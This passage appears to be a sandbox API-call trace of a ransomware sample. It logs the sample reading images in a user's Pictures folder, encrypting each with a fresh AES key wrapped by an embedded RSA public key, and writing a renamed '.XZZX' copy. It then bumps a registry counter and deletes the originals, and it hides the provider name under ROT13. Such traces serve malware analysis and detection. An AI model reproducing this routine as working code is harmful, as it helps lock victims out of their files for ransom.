hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb720 [0124.452] SetErrorMode (uMode=0x1) returned 0x1 [0124.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0124.452] OutputDebugStringW (lpOutputString="end") [0124.452] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0124.452] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0124.452] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3ce2968) returned 1 [0124.453] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2968, dwCertEncodingType=0x1, pInfo=0x3d0d068*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d098*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d0a0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cdda58) returned 1 [0124.453] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.454] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0124.454] CryptEncrypt (in: hKey=0x3cdda58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0124.454] CryptEncrypt (in: hKey=0x3cdda58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce29f0*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce29f0*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0124.454] WriteFile (in: hFile=0x5f0, lpBuffer=0x3ce29f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce29f0*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0124.454] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0124.454] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0124.454] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0124.454] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0124.454] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x5f4) returned 0x0 [0124.454] RegQueryValueExW (in: hKey=0x5f4, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x8e, lpcbData=0x434dfdc*=0x4) returned 0x0 [0124.454] RegCloseKey (hKey=0x5f4) returned 0x0 [0124.454] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x5f4) returned 0x0 [0124.454] RegSetValueExW (in: hKey=0x5f4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x8f, cbData=0x4 | out: lpData=0x434dfec*=0x8f) returned 0x0 [0124.455] RegCloseKey (hKey=0x5f4) returned 0x0 [0124.455] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.455] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.455] CloseHandle (hObject=0x5f0) returned 1 [0124.457] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0124.457] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0124.457] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fTtF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fttf.bmp")) returned 1 [0124.458] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fTtF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fttf.bmp")) returned 0 Thread: id = 407 os_tid = 0x96c [0124.197] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.197] lstrcpyW (in: lpString1=0x420f460, lpString2="g43hR4r2QCQPskvQatT.png" | out: lpString1="g43hR4r2QCQPskvQatT.png") returned="g43hR4r2QCQPskvQatT.png" [0124.198] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.198] SetErrorMode (uMode=0x1) returned 0x1 [0124.198] lstrcpyW (in: lpString1=0x420f860, lpString2="g43hR4r2QCQPskvQatT.png" | out: lpString1="g43hR4r2QCQPskvQatT.png") returned="g43hR4r2QCQPskvQatT.png" [0124.198] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x126a516d, Data2=0xf983, Data3=0x41aa, Data4=([0]=0x8b, [1]=0xd9, [2]=0xb4, [3]=0x1e, [4]=0xcb, [5]=0xa2, [6]=0x5c, [7]=0x73))) returned 0x0 [0124.198] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g43hR4r2QCQPskvQatT.png") returned 66 [0124.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0124.198] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned 80 [0124.198] StrStrW (lpFirst="g43hR4r2QCQPskvQatT.png", lpSrch="XZZX") returned 0x0 [0124.198] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g43hR4r2QCQPskvQatT.png", dwFileAttributes=0x20) returned 1 [0124.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g43hR4r2QCQPskvQatT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g43hr4r2qcqpskvqatt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0124.199] ReadFile (in: hFile=0x5c4, lpBuffer=0x3ce77e0, nNumberOfBytesToRead=0x6b17, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesRead=0x420e418*=0x6b17, lpOverlapped=0x0) returned 1 [0124.200] CloseHandle (hObject=0x5c4) returned 1 [0124.200] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0124.201] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0124.201] SetErrorMode (uMode=0x1) returned 0x1 [0124.201] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0124.201] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce28e0) returned 1 [0124.204] CryptGenKey (in: hProv=0x3ce28e0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddb18) returned 1 [0124.636] CryptExportKey (in: hKey=0x3cddb18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0124.636] CryptExportKey (in: hKey=0x3cddb18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0124.636] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.637] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0124.637] CryptDestroyKey (hKey=0x3cddb18) returned 1 [0124.637] CryptReleaseContext (hProv=0x3ce2a78, dwFlags=0x0) returned 0 [0124.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D59AAFC73FFFF3FE126A516D4420D846.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d59aafc73ffff3fe126a516d4420d846.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0124.638] WriteFile (in: hFile=0x5f4, lpBuffer=0x3ce77e0*, nNumberOfBytesToWrite=0x6b17, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesWritten=0x420e438*=0x6b17, lpOverlapped=0x0) returned 1 [0124.639] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b17 [0124.639] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0124.639] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b1c [0124.639] WriteFile (in: hFile=0x5f4, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2e, lpOverlapped=0x0) returned 1 [0124.639] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b4a [0124.639] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0124.640] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b4f [0124.640] SetErrorMode (uMode=0x1) returned 0x1 [0124.640] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0124.640] OutputDebugStringW (lpOutputString="end") [0124.640] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0124.640] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0124.640] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce2b00) returned 1 [0124.641] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2b00, dwCertEncodingType=0x1, pInfo=0x3d0d138*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d168*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d170*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddb18) returned 1 [0124.641] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.641] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0124.641] CryptEncrypt (in: hKey=0x3cddb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0124.642] CryptEncrypt (in: hKey=0x3cddb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2b88*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2b88*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0124.642] WriteFile (in: hFile=0x5f4, lpBuffer=0x3ce2b88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2b88*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0124.642] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0124.642] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0124.642] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0124.642] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0124.642] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5f8) returned 0x0 [0124.642] RegQueryValueExW (in: hKey=0x5f8, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x8f, lpcbData=0x420dfdc*=0x4) returned 0x0 [0124.642] RegCloseKey (hKey=0x5f8) returned 0x0 [0124.642] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5f8) returned 0x0 [0124.642] RegSetValueExW (in: hKey=0x5f8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x90, cbData=0x4 | out: lpData=0x420dfec*=0x90) returned 0x0 [0124.643] RegCloseKey (hKey=0x5f8) returned 0x0 [0124.643] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.643] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.643] CloseHandle (hObject=0x5f4) returned 1 [0124.644] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0124.645] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0124.645] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g43hR4r2QCQPskvQatT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g43hr4r2qcqpskvqatt.png")) returned 1 [0124.647] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g43hR4r2QCQPskvQatT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g43hr4r2qcqpskvqatt.png")) returned 0 Thread: id = 408 os_tid = 0x970 [0124.459] lstrcpyA (in: lpString1=0x449fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.459] lstrcpyW (in: lpString1=0x449f460, lpString2="ghz9u7C.png" | out: lpString1="ghz9u7C.png") returned="ghz9u7C.png" [0124.459] lstrcpyW (in: lpString1=0x449e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.459] SetErrorMode (uMode=0x1) returned 0x1 [0124.459] lstrcpyW (in: lpString1=0x449f860, lpString2="ghz9u7C.png" | out: lpString1="ghz9u7C.png") returned="ghz9u7C.png" [0124.459] CoCreateGuid (in: pguid=0x449e440 | out: pguid=0x449e440*(Data1=0x2fe67117, Data2=0x7f3b, Data3=0x4cfd, Data4=([0]=0x81, [1]=0x10, [2]=0x55, [3]=0xbd, [4]=0x4e, [5]=0xe7, [6]=0xc2, [7]=0x5b))) returned 0x0 [0124.459] wsprintfW (in: param_1=0x449ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ghz9u7C.png") returned 54 [0124.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x449fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0124.459] wsprintfW (in: param_1=0x449e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5C36794D2643414F2FE671172A8D2597.XZZX") returned 80 [0124.459] StrStrW (lpFirst="ghz9u7C.png", lpSrch="XZZX") returned 0x0 [0124.459] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ghz9u7C.png", dwFileAttributes=0x20) returned 1 [0124.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ghz9u7C.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghz9u7c.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d0 [0124.494] ReadFile (in: hFile=0x5d0, lpBuffer=0x3d0eeb0, nNumberOfBytesToRead=0x9ba, lpNumberOfBytesRead=0x449e418, lpOverlapped=0x0 | out: lpBuffer=0x3d0eeb0*, lpNumberOfBytesRead=0x449e418*=0x9ba, lpOverlapped=0x0) returned 1 [0124.495] CloseHandle (hObject=0x5d0) returned 1 [0124.495] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0124.495] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4210000 [0124.496] SetErrorMode (uMode=0x1) returned 0x1 [0124.496] lstrcpyW (in: lpString1=0x449e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0124.496] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce2a78) returned 1 [0124.498] CryptGenKey (in: hProv=0x3ce2a78, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddb98) returned 1 [0124.712] CryptExportKey (in: hKey=0x3cddb98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x449e41c | out: pbData=0x0*, pdwDataLen=0x449e41c*=0x94) returned 1 [0124.712] CryptExportKey (in: hKey=0x3cddb98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4210000, pdwDataLen=0x449e41c | out: pbData=0x4210000*, pdwDataLen=0x449e41c*=0x94) returned 1 [0124.712] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.713] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0124.713] CryptDestroyKey (hKey=0x3cddb98) returned 1 [0124.713] CryptReleaseContext (hProv=0x3ce2c10, dwFlags=0x0) returned 0 [0124.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5C36794D2643414F2FE671172A8D2597.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5c36794d2643414f2fe671172a8d2597.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0124.713] WriteFile (in: hFile=0x5cc, lpBuffer=0x3d0eeb0*, nNumberOfBytesToWrite=0x9ba, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3d0eeb0*, lpNumberOfBytesWritten=0x449e438*=0x9ba, lpOverlapped=0x0) returned 1 [0124.714] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ba [0124.714] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0124.714] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9bf [0124.714] WriteFile (in: hFile=0x5cc, lpBuffer=0x449f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x449f860*, lpNumberOfBytesWritten=0x449e438*=0x16, lpOverlapped=0x0) returned 1 [0124.714] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9d5 [0124.714] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: 